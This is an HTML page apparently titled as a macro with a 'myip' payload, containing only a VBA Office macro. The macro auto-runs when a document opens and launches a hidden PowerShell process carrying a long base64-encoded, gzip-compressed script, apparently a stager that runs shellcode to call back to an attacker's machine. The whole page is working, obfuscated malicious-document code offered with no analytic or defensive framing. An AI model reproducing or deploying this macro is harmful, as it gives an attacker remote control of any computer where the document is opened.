<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>macro with myip payload</title>
</head><body>Sub AutoOpen()<br/>
&nbsp; &nbsp; MyMacro<br/>
End Sub<br/>
&nbsp;<br/>
Sub Document_Open()<br/>
&nbsp; &nbsp; MyMacro<br/>
End Sub<br/>
&nbsp;<br/>
Sub MyMacro()<br/>
&nbsp; &nbsp; Dim Str As String<br/>
&nbsp; &nbsp; Str = Str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"<br/>
&nbsp; &nbsp; Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"<br/>
&nbsp; &nbsp; Str = Str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"<br/>
&nbsp; &nbsp; Str = Str + "H0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGk"<br/>
&nbsp; &nbsp; Str = Str + "AcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8Ad"<br/>
&nbsp; &nbsp; Str = Str + "wBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcAB"<br/>
&nbsp; &nbsp; Str = Str + "vAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9A"<br/>
&nbsp; &nbsp; Str = Str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQ"<br/>
&nbsp; &nbsp; Str = Str + "AaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAU"<br/>
&nbsp; &nbsp; Str = Str + "wB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQB"<br/>
&nbsp; &nbsp; Str = Str + "tAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9A"<br/>
&nbsp; &nbsp; Str = Str + "CcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"<br/>
&nbsp; &nbsp; Str = Str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAc"<br/>
&nbsp; &nbsp; Str = Str + "gBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB"<br/>
&nbsp; &nbsp; Str = Str + "5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkA"<br/>
&nbsp; &nbsp; Str = Str + "GUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGU"<br/>
&nbsp; &nbsp; Str = Str + "AbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAe"<br/>
&nbsp; &nbsp; Str = Str + "gBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQB"<br/>
&nbsp; &nbsp; Str = Str + "jAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5A"<br/>
&nbsp; &nbsp; Str = Str + "FMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4"<br/>
&nbsp; &nbsp; Str = Str + "AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAd"<br/>
&nbsp; &nbsp; Str = Str + "AByAGkAbgBnACgAJwAnAEgANABzAEkAQQBFAFcAcABtAEYANAB"<br/>
&nbsp; &nbsp; Str = Str + "DAEEANwBWAFcAYgBXAC8AYQBTAEIARAArAG4ARQBqADkARAAxA"<br/>
&nbsp; &nbsp; Str = Str + "GEARgBaAEYAdAB5AHcAQgBEAGEATgBKAEUAcQBuAGMAMQBMAE0"<br/>
&nbsp; &nbsp; Str = Str + "ATQBFAEoANABHAEEAQwBGAEoAMAAyADkAdAByAGUAcwBIAGoAc"<br/>
&nbsp; &nbsp; Str = Str + "ABlAHMAMQBiAHIALwAvADkAeABtAEMAMwBxAFoAcgBjAHQAUwB"<br/>
&nbsp; &nbsp; Str = Str + "lAGQAQgBXAEkAOQBPAHoATQA3ADgAOAB3AHoAcwB3AFIAcAA3A"<br/>
&nbsp; &nbsp; Str = Str + "EEAbgBDAFkAbQBtAEgAcABTADkAdgBUAGsALwA2AGkASwBPAGw"<br/>
&nbsp; &nbsp; Str = Str + "AcABKAFIANABvAEUAbQBsAGsATwBwAEQAOQBlAFEARQB4AEsAV"<br/>
&nbsp; &nbsp; Str = Str + "gBBADMAMwB5AFcAUABrAHIASwB6AEYAaQB0AG0AbQB5AEoAUwB"<br/>
&nbsp; &nbsp; Str = Str + "EAHkALwB1AG0AcQBrAG4ATwBOAFkASABOAC8ATAAxADEAZwBZA"<br/>
&nbsp; &nbsp; Str = Str + "FMAWQBLAFgAagA1AFQAZwBSAEYARwBsAHYANgBSAHgAaABEAGs"<br/>
&nbsp; &nbsp; Str = Str + "AKwB1ADMAdAA4AHcAcAA2AFEAdgBrAGkAbABQADgAdgBYAGwAR"<br/>
&nbsp; &nbsp; Str = Str + "AAwAGkAbQBxAHYAdABHAHMAaQBMAHMASABSAG0AeABIADYAMgA"<br/>
&nbsp; &nbsp; Str = Str + "xADIATQBlAHkAawBJAHAATwB5AHQASwBoAEMASgAvACsAaQBTA"<br/>
&nbsp; &nbsp; Str = Str + "HIAcwA3AFAAcQB2AE4AegA2AG4AQwBLAGEASwBMAEsAegBTAHc"<br/>
&nbsp; &nbsp; Str = Str + "AUgBlAGwAbgAxAEsAWgBWAFgANgBxAG0AWQBIADMAdQA5AFcAV"<br/>
&nbsp; &nbsp; Str = Str + "wBKAEYAdAA0AG4ARwBXAHMARQBDAFUAeAB5AFEAKwByADUAVgB"<br/>
&nbsp; &nbsp; Str = Str + "IAGMAWQBJAEMAZgBBAHYAZQAxAHQAagBHAEkAbQBKACsASQBxA"<br/>
&nbsp; &nbsp; Str = Str + "HUAUQBCAFgAdwA0AEYAaQBtAFAAcABVAE0AKwBtAFkAUABqAHQ"<br/>
&nbsp; &nbsp; Str = Str + "AaQBMAEQAcwBzACsAWgBaAC8AZwArAHgAMABrAGkAYQA5AEkAc"<br/>
&nbsp; &nbsp; Str = Str + "wBjAHoAMgBiAHoALwA5AFEAWgB2AG0ANQB3AHoAUQBXAFoASQB"<br/>
&nbsp; &nbsp; Str = Str + "uAEwAVgBpAHcAdwBaAHkAcwBIADgAegBYAHgAYwBGAEwAdQBvA"<br/>
&nbsp; &nbsp; Str = Str + "E4AaQBuAGUASQBpAEQATwBWAGcANQBnAHAATQA0AG4ASwBzAHE"<br/>
&nbsp; &nbsp; Str = Str + "AcQBLADMAWgBBAGkAdQBsAE8ASwBWAFUAawAzADcASABqAFgAS"<br/>
&nbsp; &nbsp; Str = Str + "wBMAE4AdwBWAHEAdgAyAHEAawBQAEQAYwBDAHIAYgA3AGcAcQB"<br/>
&nbsp; &nbsp; Str = Str + "nAFoAMQBmAEMARgBQAG0ALwBrAHAAeABVAGQATAArAFkAVgBBA"<br/>
&nbsp; &nbsp; Str = Str + "G8AZgBZAHEAUABFAFgAOQBBAGIAaQB2AGIAMAA3AGYAbgBBAFk"<br/>
&nbsp; &nbsp; Str = Str + "ARgBVAC8AWQBYAE8AbgAvADMAbgBDAHkAdwBPAHAAawBkADEAa"<br/>
&nbsp; &nbsp; Str = Str + "ABpAGkAVQAvAG8AcwBJAFEAZgBGAGoANQBLAHUAUwBUAGEAYwB"<br/>
&nbsp; &nbsp; Str = Str + "nAHcAVABqAE8AMwBnAHQAMwBmAE0AVQBxAC8ATgB2ADIATQBJA"<br/>
&nbsp; &nbsp; Str = Str + "EoATgA3AHQAWQBlADkAMgArAFcAaQBpAEQANgByAHIANgBBAEo"<br/>
&nbsp; &nbsp; Str = Str + "ASwBaAHkANABnAC8AQgA0AHUAOABuAHEAWABkAE4AcABPACsAe"<br/>
&nbsp; &nbsp; Str = Str + "gBzAG8AbQBEAGsAaQBNAG0ANwBzAFkATABZAGwAWABFAEUAOQA"<br/>
&nbsp; &nbsp; Str = Str + "1AEMAVwBJAGMAVQBIAHoASQBzAEYAeQBvADMAVQBKAEUAaQBwA"<br/>
&nbsp; &nbsp; Str = Str + "HgAdgBZAEwAKwBKAEsAUQA2AFIAeQBFAEQATABLAHYAMgBUAFc"<br/>
&nbsp; &nbsp; Str = Str + "AVwB0AEoAeABEAGQAYgBNAHkAWABVAHgAOQB6AHcAbwBFAHcAS"<br/>
&nbsp; &nbsp; Str = Str + "gBSAEEAVQBWAFYASAA4AE0ANQBsAGcASABSAGIAWgBpAEcAeQA"<br/>
&nbsp; &nbsp; Str = Str + "4AEIAbwBPAE0ANwBVAEsAOABVAEEATgAxAHgAbwBaADEAVABmA"<br/>
&nbsp; &nbsp; Str = Str + "EYAZQBjAG4AcgAyAEQAawB0AHkAZwBLAEUAawAwAHEAWgA5AEM"<br/>
&nbsp; &nbsp; Str = Str + "AdgAzAG0AYQA1AEcAQgBFAHMAYQA5AEoAUgBwAHkAUQBmAE0Ad"<br/>
&nbsp; &nbsp; Str = Str + "ABJAEIAVABzAHMANQBlAC8AaAAyAGkAawBWAHgARQBPAEoASwB"<br/>
&nbsp; &nbsp; Str = Str + "OAHoATgAxAFMATwBLACsAVwBrAE4ARgBpAGUAQwBwAHgANQBVA"<br/>
&nbsp; &nbsp; Str = Str + "EQARABLAC8AZAAxAGIAWQBJADQAaABtAFEARwBoAFMAaAAvAGo"<br/>
&nbsp; &nbsp; Str = Str + "AWQAzAEQAawBrAEwARQA2AFYAWAA0AFMAaABnAFMAaQBGAEgAZ"<br/>
&nbsp; &nbsp; Str = Str + "wBCAFAAYQB5AGcARABTAEwATAAwAEgAWgBIAHgAZwBQAHYAYQB"<br/>
&nbsp; &nbsp; Str = Str + "zAGUAWgBxADIAYwBIAEMAVwBxADQAbwBYAG8ATABPAG8AZQAzA"<br/>
&nbsp; &nbsp; Str = Str + "GIARgBJAFgAUQA1AEQAbgBUAEQAOABSAEIASQBmAGIAbABIACs"<br/>
&nbsp; &nbsp; Str = Str + "ATQByAGUASAB3AGsAYgBZAFoARABBAGMAQwB6ADYASwBDADQAR"<br/>
&nbsp; &nbsp; Str = Str + "ABtAFYAQwBrADEAegBDAEIAYwB5AE8ARABGAE8AZwB6ADMAOAA"<br/>
&nbsp; &nbsp; Str = Str + "3ACsAOQBuAFEAZwBDAGcAYQBIAE8AYwAxAFUASQByAEcAbQBKA"<br/>
&nbsp; &nbsp; Str = Str + "GsANwBrAGIARwA1AHQATwBtADIATQBpADcAbQBpAEIAegB5ADU"<br/>
&nbsp; &nbsp; Str = Str + "AdwBKAHkAYgAzAE8AMgBOAEYARwBDADMAOQBlAFAAMAAwAEYAN"<br/>
&nbsp; &nbsp; Str = Str + "QBXADcAawBqAEQAUQBPAGUAaQBSAFYAVAAyAHoATQBYAHAARwB"<br/>
&nbsp; &nbsp; Str = Str + "wAHMAUwBOAFcAeQA0AFQAcwBpADUAeABaAHIAWAB2AGcAMwAzA"<br/>
&nbsp; &nbsp; Str = Str + "GEAZABPAGgAVABlADMAVQBXAEIAWQBpAFcAVgAzACsAcwAxAEI"<br/>
&nbsp; &nbsp; Str = Str + "AcAAxAE4AZgBkAHgAMgAzAEwAcAB5AFcASgBXADcANgBsAHIAQ"<br/>
&nbsp; &nbsp; Str = Str + "gBiAEQAMAA5AFAAagB0AEUAWgBqAGkAWgBpAGEAaABtAGQAZQA"<br/>
&nbsp; &nbsp; Str = Str + "2AEkAdgBKAHYAWAA5AHEAawB2ADIAVABzAC8AdwBKADkAdgBLA"<br/>
&nbsp; &nbsp; Str = Str + "CsANwAyADUAMwArAGoAbQBkAHYAOABVACsAcwBHAGsARwBRAFQ"<br/>
&nbsp; &nbsp; Str = Str + "AaABSAGUAQQBNAHEAKwAvAGEAcABEAGQAdQBEAEUAeQA5AGgAb"<br/>
&nbsp; &nbsp; Str = Str + "gByAE4AVgB0AG8AYgBtAHgAdABUAHIAeQBjAHQAcwB1AGsATQB"<br/>
&nbsp; &nbsp; Str = Str + "5AEcAaQB3ADYATABiAEYANAA4AFMAbABhAEIAUgBVAHcAbwBmA"<br/>
&nbsp; &nbsp; Str = Str + "HEASgBTAEwAYgBIAG4AOQB5AHEAOAB6AGUAVwA0AFoAeABIAFo"<br/>
&nbsp; &nbsp; Str = Str + "AMQA3ACsAMgA3AGcAWABrAGUAMgB2ADUAdAAwAEsAcABmAGoAK"<br/>
&nbsp; &nbsp; Str = Str + "wBzAEoAbwBHAFUAWQBqAGIAcgBsAHQAawA5ADEATQBUAEcANwA"<br/>
&nbsp; &nbsp; Str = Str + "wAEsAKwA2AG8AYgBRADUARwBMAFgATQB3AEEATgBuADcAcwBCA"<br/>
&nbsp; &nbsp; Str = Str + "EwAVQBRAFUAWgByAHIASQAzAHMAQgB2AE0AdgBYAEcAYQBFAHg"<br/>
&nbsp; &nbsp; Str = Str + "AdgBEAEIAaQBwAGMAbwBNAHMAZAB1AGoAVQB4AFgARAA4AE0AS"<br/>
&nbsp; &nbsp; Str = Str + "QBmAEwAVQBoAEIATAB1AGkAMQB5ADAAZgBiADkAbQBIADMAcAB"<br/>
&nbsp; &nbsp; Str = Str + "pADQANgA0AHEATAByAG0ALwBGADEARwBoADAANgAxAFgALwB3A"<br/>
&nbsp; &nbsp; Str = Str + "GQAMQAzAGEAaQBqAHEAVAB0ADIAMABkAHoAbABOAC8ARgBhADM"<br/>
&nbsp; &nbsp; Str = Str + "AdQBUAEcATgBTAGIAWABWAE4AWgB2AFgAUgBtAHMANABHAHIAV"<br/>
&nbsp; &nbsp; Str = Str + "wBuAFkAMwBjAHgASABkAC8AVAA2AFgAaABVAG4AVABMAHMAYgB"<br/>
&nbsp; &nbsp; Str = Str + "TAG8AUgArAEMARABZAHYASABNAFgAagB4AFgANwBPAHIAUwBpA"<br/>
&nbsp; &nbsp; Str = Str + "GIAVABXAEUAcwB5ADQATwAvAHAAZABrAFMAUgA5AHIAZgB1AFY"<br/>
&nbsp; &nbsp; Str = Str + "AeQA5AE0ARwBNAE4AegBkAGgAZgB4ADMANgBnAC8ASABGAGMAS"<br/>
&nbsp; &nbsp; Str = Str + "AB1ADcAZQA2AHcAeABZADEAUwBwAHUARwA4AHoASQBnAEEAVAB"<br/>
&nbsp; &nbsp; Str = Str + "TAHQARQBOAGUAVgBiAGkAMQA2AGEAeQBqAFgAZwBTAEkAUQBxA"<br/>
&nbsp; &nbsp; Str = Str + "GwAaAAzAEYAYgBOAEYAcQBiADgAWABZACsAUQB2AHUATQBaAEI"<br/>
&nbsp; &nbsp; Str = Str + "AYQBLAEEAcABmAHUAQQB2AE0AWQBVADcAaQAwADQARgBvAHIAK"<br/>
&nbsp; &nbsp; Str = Str + "wBHAHAAUQB5AHIAeABzAGYAQgA5AEgATABkAHcAZAB4ADQAbQB"<br/>
&nbsp; &nbsp; Str = Str + "lAFgAVABBAGoAVwBKADcAWABYAGwAeQBwADAAagBkAEYAOQBmA"<br/>
&nbsp; &nbsp; Str = Str + "HQAYwBMADAAUgBYAFYAMQBNAEkARQBuAG8AQQBhAEYAcgB1ADQ"<br/>
&nbsp; &nbsp; Str = Str + "AVABnAFUAawBhAFoAdgB6ADMAVQBkAGgAcgBTACsAcgBlAHUAU"<br/>
&nbsp; &nbsp; Str = Str + "QA0AHEALwBuADEAVwBDAHIAbgBaAEoANQAwAHIASQBaAG4AOAB"<br/>
&nbsp; &nbsp; Str = Str + "HAFMATwA2AFkASAB4ADIAcgBXAEYANgBYAFYAbwBQADkALwBnA"<br/>
&nbsp; &nbsp; Str = Str + "HAAVwAzAFkAZwBRAC8ALwByACsAQwA5AFYAMwAyAEQANwB1AC8"<br/>
&nbsp; &nbsp; Str = Str + "AQgBLAEMAdQBIAGQATAA5AFMAZgBxAGoANABMAGYAUQAvAE0AM"<br/>
&nbsp; &nbsp; Str = Str + "wBFAHgANABnAEkAMABIAE4AZwBsAEYAQgA4AHYATQBSAGUAeQB"<br/>
&nbsp; &nbsp; Str = Str + "UAC8AbgB4AGIATgBMAEgAbQBvAEMAVgBRAC8AeQBKAC8AdQBUA"<br/>
&nbsp; &nbsp; Str = Str + "GQAcABlAEsAcwAxAHUANAArAHQAKwBjAC8AZwAxAE8AVgA4ACs"<br/>
&nbsp; &nbsp; Str = Str + "AQQBEAEEAbwBBAEEAQQA9AD0AJwAnACkAKQApACwAWwBTAHkAc"<br/>
&nbsp; &nbsp; Str = Str + "wB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgA"<br/>
&nbsp; &nbsp; Str = Str + "uAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6A"<br/>
&nbsp; &nbsp; Str = Str + "EQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQ"<br/>
&nbsp; &nbsp; Str = Str + "AbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZ"<br/>
&nbsp; &nbsp; Str = Str + "QBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJAB"<br/>
&nbsp; &nbsp; Str = Str + "zAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPA"<br/>
&nbsp; &nbsp; Str = Str + "HUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQ"<br/>
&nbsp; &nbsp; Str = Str + "AbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAc"<br/>
&nbsp; &nbsp; Str = Str + "wAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAB"<br/>
&nbsp; &nbsp; Str = Str + "yAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnA"<br/>
&nbsp; &nbsp; Str = Str + "G4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFM"<br/>
&nbsp; &nbsp; Str = Str + "AdABhAHIAdAAoACQAcwApADsA"<br/>
&nbsp; &nbsp; <br/>
&nbsp; &nbsp; CreateObject("Wscript.Shell").Run Str<br/>
End Sub<br/>
</body></html>